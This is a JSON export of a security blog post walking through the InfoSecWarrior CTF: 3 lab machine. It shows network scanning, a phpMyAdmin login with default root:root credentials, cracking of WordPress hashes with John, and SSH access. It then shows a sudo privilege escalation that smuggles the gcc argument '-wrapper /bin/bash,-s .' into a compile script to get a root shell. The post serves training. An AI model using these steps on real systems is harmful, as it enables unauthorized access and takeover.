{"id":26013,"date":"2020-04-09T23:55:45","date_gmt":"2020-04-09T18:25:45","guid":{"rendered":"https:\/\/www.armourinfosec.com\/?p=26013"},"modified":"2020-04-10T09:26:08","modified_gmt":"2020-04-10T03:56:08","slug":"infosecwarrior-ctf-3-walkthrough","status":"publish","type":"post","link":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","title":{"rendered":"InfoSecWarrior CTF: 3 Walkthrough"},"content":{"rendered":"<p>Here is the new challenge of <a href=\"https:\/\/www.infosecwarrior.com\/infosecwarrior-ctf-2020-3\/\"><strong>InfoSecWarrior CTF: 3 Walkthrough<\/strong><\/a> by <a href=\"https:\/\/www.infosecwarrior.com\/\">Infosec Warrior CTF 2020<\/a>. The box is designed by Vishal Biswas aka CyberKnight. The goal is to gain the highest privileges and collect only 2 flags (user flag and root flag). According to author box consist\u00a0 WordPress developer configured the machine to work internally. But due to some miss-configuration WordPress is exposed to the outside world. Use your skills and get the root flag. So let us go.<\/p>\n<p>&nbsp;<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26026 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-10-09-07-53.png\" alt=\"\" width=\"800\" height=\"522\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-10-09-07-53.png 800w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-10-09-07-53-300x196.png 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-10-09-07-53-768x501.png 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><\/p>\n<h3>Pentester Methodology<\/h3>\n<h5>Network Scanning<\/h5>\n<ul>\n<li>Netdiscover<\/li>\n<li>Nmap<\/li>\n<\/ul>\n<h5>Enumeration<\/h5>\n<ul>\n<li>Nikto<\/li>\n<li>phpMyAdmin<\/li>\n<li>John<\/li>\n<li>SSH<\/li>\n<\/ul>\n<h5>Privilege Escalation<\/h5>\n<ul>\n<li>Sudo -l<\/li>\n<li>gcc compilation<\/li>\n<\/ul>\n<h3>Network Scanning<\/h3>\n<p>We start with\u00a0<strong>Netdiscover\u00a0<\/strong> to obtain IP address as followed<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">#netdiscover -i vboxnet0\r\n\t Currently scanning: 192.168.12.0\/16   |   Screen View: Unique Hosts                                                                                                                            \r\n                                                                                                                                                                                                \r\n 2 Captured ARP Req\/Rep packets, from 2 hosts.   Total size: 102                                                                                                                                \r\n _____________________________________________________________________________\r\n   IP            At MAC Address     Count     Len  MAC Vendor \/ Hostname      \r\n -----------------------------------------------------------------------------\r\n 192.168.2.2     08:00:27:a0:51:d5      1      42  PCS Systemtechnik GmbH                                                                                                                       \r\n 192.168.2.17    08:00:27:a7:26:e1      1      60  PCS Systemtechnik GmbH\r\n<\/pre>\n<p>Got the machine Ip <strong>192.168.2.17\u00a0<\/strong>and let us scan the\u00a0<strong>Nmap.<\/strong><\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">#nmap -p- -A -O 192.168.2.17\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-04-09 18:53 IST\r\nNmap scan report for 192.168.2.17\r\nHost is up (0.00048s latency).\r\nNot shown: 65533 closed ports\r\nPORT   STATE SERVICE VERSION\r\n22\/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)\r\n| ssh-hostkey: \r\n|   2048 d8:ad:48:16:27:f8:cc:99:3a:2f:db:c1:a9:d5:3a:d1 (RSA)\r\n|   256 51:06:ab:78:61:f5:4c:03:a0:8f:01:27:f9:17:51:e7 (ECDSA)\r\n|_  256 d5:63:58:ba:2a:d5:d2:17:cb:63:12:34:d6:cd:b6:b9 (ED25519)\r\n80\/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))\r\n|_http-generator: WordPress 5.3.2\r\n|_http-server-header: Apache\/2.4.29 (Ubuntu)\r\n|_http-title: TEST WORDPRESS \u2013 Just another WordPress site\r\nMAC Address: 08:00:27:A7:26:E1 (Oracle VirtualBox virtual NIC)\r\nNo exact OS matches for host (If you know what OS is running on it, see https:\/\/nmap.org\/submit\/ ).\r\nTCP\/IP fingerprint:\r\nOS:SCAN(V=7.80%E=4%D=4\/9%OT=22%CT=1%CU=44313%PV=Y%DS=1%DC=D%G=Y%M=080027%TM\r\nOS:=5E8F21EA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%\r\nOS:TS=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5\r\nOS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=\r\nOS:FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%\r\nOS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0\r\nOS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S\r\nOS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R\r\nOS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N\r\nOS:%T=40%CD=S)<\/pre>\n<h3>Enumeration<\/h3>\n<p>On visiting the web page there, we see a WordPress web site. But the WordPress website doesn\u2019t work properly error here so we moved on our next step.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26015 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-082625.jpg\" alt=\"\" width=\"537\" height=\"677\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-082625.jpg 537w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-082625-238x300.jpg 238w\" sizes=\"(max-width: 537px) 100vw, 537px\" \/><\/p>\n<p>So I fired\u00a0<strong>Nikto\u00a0<\/strong>and found\u00a0<strong>phpMyAdmin page.<\/strong><\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">#nikto -h http:\/\/192.168.2.17\/\r\n- Nikto v2.1.6\r\n---------------------------------------------------------------------------\r\n+ Target IP:          192.168.2.17\r\n+ Target Hostname:    192.168.2.17\r\n+ Target Port:        80\r\n+ Start Time:         2020-04-09 18:55:13 (GMT5.5)\r\n---------------------------------------------------------------------------\r\n+ Server: Apache\/2.4.29 (Ubuntu)\r\n+ The anti-clickjacking X-Frame-Options header is not present.\r\n+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS\r\n+ Uncommon header 'link' found, with contents: &lt;http:\/\/127.0.0.1\/index.php\/wp-json\/&gt;; rel=\"https:\/\/api.w.org\/\"\r\n+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site differently to the MIME type\r\n+ Uncommon header 'x-redirect-by' found, with contents: WordPress\r\n+ No CGI Directories found (use '-C all' to force check all possible dirs)\r\n+ Apache\/2.4.29 appears to be outdated (current is at least Apache\/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.\r\n+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.\r\n+ Uncommon header 'x-ob_mode' found, with contents: 1\r\n+ Cookie goto created without the httponly flag\r\n+ Cookie back created without the httponly flag\r\n+ OSVDB-3092: \/phpMyAdmin\/ChangeLog: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\r\n+ OSVDB-3233: \/icons\/README: Apache default file found.\r\n+ \/wp-content\/plugins\/akismet\/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version\r\n+ \/wp-links-opml.php: This WordPress script reveals the installed version.\r\n+ OSVDB-3092: \/license.txt: License file found may identify site software.\r\n+ \/: A WordPress installation was found.\r\n+ \/phpmyadmin\/: phpMyAdmin directory found\r\n+ Cookie wordpress_test_cookie created without the httponly flag\r\n+ \/wp-login.php: WordPress login found\r\n+ OSVDB-3092: \/phpMyAdmin\/README: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.\r\n+ 7916 requests: 0 error(s) and 20 item(s) reported on remote host\r\n+ End Time:           2020-04-09 18:56:16 (GMT5.5) (63 seconds)\r\n---------------------------------------------------------------------------\r\n+ 1 host(s) tested<\/pre>\n<p>so I logged in with credentials <strong>root: root.\u00a0<\/strong>it was a success<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26016 size-full\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083215.jpg\" alt=\"InfoSecWarrior CTF: 3 Walkthrough\" width=\"841\" height=\"494\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083215.jpg 841w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083215-300x176.jpg 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083215-768x451.jpg 768w\" sizes=\"(max-width: 841px) 100vw, 841px\" \/><\/p>\n<p>We successfully login with the root MySQL database then I select the wpdb database on open the wp-user table and we see two user entries Krishna and user1 as shown in the image file.<\/p>\n<p><img decoding=\"async\" class=\"alignnone wp-image-26017 size-large\" src=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083316-1024x460.jpg\" alt=\"InfoSecWarrior CTF: 3 Walkthrough\" width=\"1024\" height=\"460\" srcset=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083316-1024x460.jpg 1024w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083316-300x135.jpg 300w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083316-768x345.jpg 768w, https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-083316.jpg 1160w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/p>\n<p>I copy the users hash and save a text file and crack the hash using the john tool use the following command<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">john --wordlist=\/usr\/share\/wordlists\/rockyou.txt hash\r\nUsing default input encoding: UTF-8\r\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\r\nCost 1 (iteration count) is 8192 for all loaded hashes\r\nWill run 2 OpenMP threads\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\n0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g\/s 5444p\/s 5444c\/s 5444C\/s sharpie1..alvina\r\n0g 0:00:00:45 1.36% (ETA: 20:08:02) 0g\/s 5109p\/s 5109c\/s 5109C\/s 12062525..109109109\r\ninfosec\t\t\t\t\t(?)\r\nSession aborted\r\n\r\njohn --wordlist=\/usr\/share\/wordlists\/rockyou.txt user\r\nUsing default input encoding: UTF-8\r\nLoaded 1 password hash (phpass [phpass ($P$ or $H$) 256\/256 AVX2 8x3])\r\nCost 1 (iteration count) is 8192 for all loaded hashes\r\nWill run 2 OpenMP threads\r\nPress 'q' or Ctrl-C to abort, almost any other key for status\r\n0g 0:00:00:04 0.13% (ETA: 20:05:08) 0g\/s 5444p\/s 5444c\/s 5444C\/s sharpie1..alvina\r\n0g 0:00:00:45 23.36% (ETA: 20:08:02) 0g\/s 5109p\/s 5109c\/s 5109C\/s 12062525..109109109\r\nuser1\t\t\t\t\t(?)\r\nSession aborted<\/pre>\n<p>And we see WordPress hashes is cracked successfully and I try to login ssh using the WordPress credentials and us successful login with ssh Krishna shell. Krishna: infosec<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">#ssh krishna@192.168.2.17\r\nThe authenticity of host '192.168.2.17 (192.168.2.17)' can't be established.\r\nECDSA key fingerprint is SHA256:L8AFuzt5MRe4jDRpDukvoY4rrvpBMl49RbM0tbVdeVM.\r\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\r\nWarning: Permanently added '192.168.2.17' (ECDSA) to the list of known hosts.\r\nkrishna@192.168.2.17's password: \r\nkrishna@ck05:~$ id \r\nuid=1001(krishna) gid=1001(krishna) groups=1001(krishna)\r\nkrishna@ck05:~$ hostname\r\nck05\r\nkrishna@ck05:~$ whoami \r\nkrishna<\/pre>\n<p>Got the Shell<\/p>\n<h3>Privilege Escalation<\/h3>\n<p>I ran the<strong> sudo -l<\/strong> command and I found <strong>Krishna<\/strong> has <strong>sudo<\/strong> permission to run a bash script as <strong>loopspell<\/strong> this script is compiler a <strong>#C<\/strong> language file using <strong>gcc<\/strong> using this command we privilege escalate this machine.<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">krishna@ck05:~$ sudo -l\r\nMatching Defaults entries for krishna on ck05:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser krishna may run the following commands on ck05:\r\n    (loopspell : ALL) NOPASSWD: \/home\/loopspell\/code_compiler.sh\r\nkrishna@ck05:~$ sudo -u loopspell \/home\/loopspell\/code_compiler.sh \"-wrapper \/bin\/bash,-s .\"\r\nCode is being compiling ...\r\nloopspell@ck05:~$ id \r\nuid=1002(loopspell) gid=1002(loopspell) groups=1002(loopspell)\r\nloopspell@ck05:~$ hostname\r\nck05\r\nloopspell@ck05:~$ whoami \r\nloopspell<\/pre>\n<p>The sudo -l command and we see sudoers filer entry <strong>\/usr\/bin\/gcc<\/strong> and <strong>code_compiler.sh<\/strong>. using sudo I again run the privilege escalation command and we have a root shell target machine<\/p>\n<pre class=\"toolbar:2 striped:false nums:false nums-toggle:false show-plain:3 lang:default highlight:0 decode:true\">loopspell@ck05:\/home$ cd loopspell\/\r\nloopspell@ck05:\/home\/loopspell$ ls \r\nbackup.c  backup.txt  code_compiler.sh\tuser.txt\r\nloopspell@ck05:\/home\/loopspell$ cat user.txt \r\na4e3fea7510e570f6964899eb764abdc\r\nloopspell@ck05:\/home\/loopspell$ sudo -l\r\nMatching Defaults entries for loopspell on ck05:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser loopspell may run the following commands on ck05:\r\n    (ALL : ALL) \/usr\/bin\/gcc\r\n    (ALL : ALL) NOPASSWD: \/home\/loopspell\/code_compiler.sh\r\nloopspell@ck05:\/home\/loopspell$ sudo -l\r\nMatching Defaults entries for loopspell on ck05:\r\n    env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\r\n\r\nUser loopspell may run the following commands on ck05:\r\n    (ALL : ALL) \/usr\/bin\/gcc\r\n    (ALL : ALL) NOPASSWD: \/home\/loopspell\/code_compiler.sh\r\nloopspell@ck05:\/home\/loopspell$ sudo \/home\/loopspell\/code_compiler.sh \r\nCode is being compiling ...\r\ngcc: fatal error: no input files\r\ncompilation terminated.\r\nYou can find your compiled code in \/tmp\/ directory.\r\nloopspell@ck05:\/home\/loopspell$ sudo \/home\/loopspell\/code_compiler.sh \"-wrapper \/bin\/bash,-s .\"\r\nCode is being compiling ...\r\nroot@ck05:\/home\/loopspell# id \r\nuid=0(root) gid=0(root) groups=0(root)\r\nroot@ck05:\/home\/loopspell# hostname\r\nck05\r\nroot@ck05:\/home\/loopspell# whoami\r\nroot\r\nroot@ck05:\/home\/loopspell# passwd\r\nEnter new UNIX password: \r\nRetype new UNIX password: \r\npasswd: password updated successfully\r\nroot@ck05:\/home\/loopspell# cd \r\nroot@ck05:~# ls\r\nmsg.txt\r\nroot@ck05:~# cd \/root\/\r\nroot@ck05:\/root# ls\r\nroot.txt\r\nroot@ck05:\/root# cat root\r\ncat: root: No such file or directory\r\nroot@ck05:\/root# cat root.txt \r\n_________        ___.                 ____  __.      .__       .__     __    _______   .________\r\n\\_   ___ \\___.__.\\_ |__   ___________|    |\/ _| ____ |__| ____ |  |___\/  |_  \\   _  \\  |   ____\/\r\n\/    \\  \\&lt;   |  | | __ \\_\/ __ \\_  __ \\      &lt;  \/    \\|  |\/ ___\\|  |  \\   __\\ \/  \/_\\  \\ |____  \\ \r\n\\     \\___\\___  | | \\_\\ \\  ___\/|  | \\\/    |  \\|   |  \\  \/ \/_\/  &gt;   Y  \\  |   \\  \\_\/   \\\/       \\\r\n \\______  \/ ____| |___  \/\\___  &gt;__|  |____|__ \\___|  \/__\\___  \/|___|  \/__|    \\_____  \/______  \/\r\n        \\\/\\\/          \\\/     \\\/              \\\/    \\\/  \/_____\/      \\\/              \\\/       \\\/ \r\n\r\n\r\nflag = efa4c284b8e2a15674dfb369384c8bcf\r\n\r\nThis flag is a proof that you get the root shell.\r\n\r\nTag me on Twitter with @CyberKnight00 \r\nroot@ck05:\/root# \r\n<\/pre>\n<p>Eureka !!!! got root.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Here is the new challenge of InfoSecWarrior CTF: 3 Walkthrough by Infosec Warrior CTF 2020. The box is designed by&#8230;<\/p>\n","protected":false},"author":1,"featured_media":26015,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[107],"tags":[124,125,119,123,118,122],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.0 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec<\/title>\n<meta name=\"description\" content=\"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec\" \/>\n<meta property=\"og:description\" content=\"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/\" \/>\n<meta property=\"og:site_name\" content=\"Armour Infosec\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/ArmourInfosec\" \/>\n<meta property=\"article:published_time\" content=\"2020-04-09T18:25:45+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-04-10T03:56:08+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-082625.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"537\" \/>\n\t<meta property=\"og:image:height\" content=\"677\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Armour Infosec\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:site\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Armour Infosec\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/\",\"url\":\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/\",\"name\":\"InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec\",\"isPartOf\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#website\"},\"datePublished\":\"2020-04-09T18:25:45+00:00\",\"dateModified\":\"2020-04-10T03:56:08+00:00\",\"author\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\"},\"description\":\"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.armourinfosec.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"InfoSecWarrior CTF: 3 Walkthrough\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.armourinfosec.com\/#website\",\"url\":\"https:\/\/www.armourinfosec.com\/\",\"name\":\"Armour Infosec\",\"description\":\"Do Your Part - Be Security Smart\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.armourinfosec.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\",\"name\":\"Armour Infosec\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"caption\":\"Armour Infosec\"},\"sameAs\":[\"https:\/\/www.armourinfosec.com\/\"],\"url\":\"https:\/\/www.armourinfosec.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec","description":"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec","og_description":"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.","og_url":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-04-09T18:25:45+00:00","article_modified_time":"2020-04-10T03:56:08+00:00","og_image":[{"width":537,"height":677,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Annotation-2020-04-09-082625.jpg","type":"image\/jpeg"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. reading time":"8 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/","name":"InfoSecWarrior CTF: 3 Walkthrough - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-04-09T18:25:45+00:00","dateModified":"2020-04-10T03:56:08+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"Here is the walkthrough of last challenge of InfosecWarrior CTF: 3 by Infosec Warriors. The box is designed by Vishal Biswas aka Cyber Knight.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/infosecwarrior-ctf-3-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"InfoSecWarrior CTF: 3 Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/26013"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=26013"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/26013\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/26015"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=26013"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=26013"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=26013"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}